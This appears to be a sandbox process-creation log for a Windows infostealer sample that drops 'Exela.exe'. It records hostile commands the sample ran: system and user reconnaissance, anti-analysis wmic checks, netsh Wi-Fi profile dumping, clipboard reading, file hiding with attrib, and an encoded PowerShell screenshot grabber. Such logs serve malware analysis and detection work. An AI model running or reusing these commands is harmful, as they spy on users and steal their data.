Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\query.exe query user
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup administrators
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user guest
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /svc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show config
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\System32\query.exe Process created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZ